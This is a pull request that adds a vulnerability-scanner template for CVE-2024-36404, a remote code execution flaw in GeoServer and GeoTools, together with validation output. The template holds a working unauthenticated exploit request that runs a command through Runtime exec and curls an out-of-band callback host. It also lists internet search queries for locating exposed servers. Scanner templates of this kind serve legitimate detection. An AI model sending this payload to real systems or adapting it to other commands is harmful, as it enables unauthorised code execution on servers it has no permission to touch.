### PR TITLE
Create CVE-2024-36404.yaml (GeoServer & GeoTool - RCE)

### DIFF
--- a/http/cves/2024/CVE-2024-36404.yaml
+++ b/http/cves/2024/CVE-2024-36404.yaml
@@ -1,0 +1,50 @@
+id: CVE-2024-36404
+
+info:
+  name: GeoServer and GeoTools - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: |
+    GeoTools is an open source Java library that provides tools for geospatial data. Prior to versions 31.2, 30.4, and 29.6, Remote Code Execution (RCE) is possible if an application uses certain GeoTools functionality to evaluate XPath expressions supplied by user input. Versions 31.2, 30.4, and 29.6 contain a fix for this issue. As a workaround, GeoTools can operate with reduced functionality by removing the `gt-complex` jar from one's application. As an example of the impact, application schema `datastore` would not function without the ability to use XPath expressions to query complex content. Alternatively, one may utilize a drop-in replacement GeoTools jar from SourceForge for versions 31.1, 30.3, 30.2, 29.2, 28.2, 27.5, 27.4, 26.7, 26.4, 25.2, and 24.0. These jars are for download only and are not available from maven central, intended to quickly provide a fix to affected applications.
+  reference:
+    - https://nsfocusglobal.com/remote-code-execution-vulnerability-between-geoserver-and-geotools-cve-2024-36401-cve-2024-36404-notification/
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-36404
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-36404
+    cwe-id: CWE-95
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: osgeo
+    product: geoserver
+    shodan-query: "Server: GeoHttpServer"
+    fofa-query:
+      - title="geoserver"
+      - app="geoserver"
+  tags: cve,cve2024,geoserver,rce,unauth,kev
+
+http:
+  - raw:
+      - |
+        POST /geoserver/wfs HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <wfs:GetPropertyValue service='WFS' version='2.0.0'
+        xmlns:topp='http://www.openplans.org/topp'
+        xmlns:fes='http://www.opengis.net/fes/2.0'
+        xmlns:wfs='http://www.opengis.net/wfs/2.0'>
+          <wfs:Query typeNames='sf:archsites'/>
+          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl {{interactsh-url}}')</wfs:valueReference>
+        </wfs:GetPropertyValue>
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "http")'
+          - 'contains(body, "java.lang.ClassCastException")'
+          - 'contains(content_type, "application/xml")'
+          - 'status_code == 400'
+        condition: and


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)
```
HTTP/1.1 400 
Connection: close
Transfer-Encoding: chunked
Content-Type: application/xml
Date: Mon, 16 Dec 2024 05:13:32 GMT
X-Frame-Options: SAMEORIGIN

<?xml version="1.0" encoding="UTF-8"?><ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/1.1 http://192.168.1.29:8080/geoserver/schemas/ows/1.1.0/owsAll.xsd">
<ows:Exception exceptionCode="NoApplicableCode">
<ows:ExceptionText>java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.feature.type.AttributeDescriptor (java.lang.ProcessImpl is in module java.base of loader &amp;apos;bootstrap&amp;apos;; org.opengis.feature.type.AttributeDescriptor is in unnamed module of loader org.apache.catalina.loader.ParallelWebappClassLoader @12365c88)
class java.lang.ProcessImpl cannot be cast to class org.opengis.feature.type.AttributeDescriptor (java.lang.ProcessImpl is in module java.base of loader &amp;apos;bootstrap&amp;apos;; org.opengis.feature.type.AttributeDescriptor is in unnamed module of loader org.apache.catalina.loader.ParallelWebappClassLoader @12365c88)</ows:ExceptionText>
</ows:Exception>
</ows:ExceptionReport>
[ctfrduqo53r75htkl3bgzftjco6sh7tus] Received HTTP interaction from <IP> at 2024-12-16 05:13:33
------------
HTTP Request
------------

GET / HTTP/1.1
Host: ctfrduqo53r75htkl3bgzftjco6sh7tus.oast.pro
Accept: */*
User-Agent: curl/7.81.0




------------
HTTP Response
------------

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.pro
X-Interactsh-Version: 1.2.2

<html><head></head><body>sut7hs6ocjtfzgb3lkth57r35oqudrftc</body></html>

[CVE-2024-36404:dsl-1] [http] [critical] http://localhost:8080/geoserver/wfs
```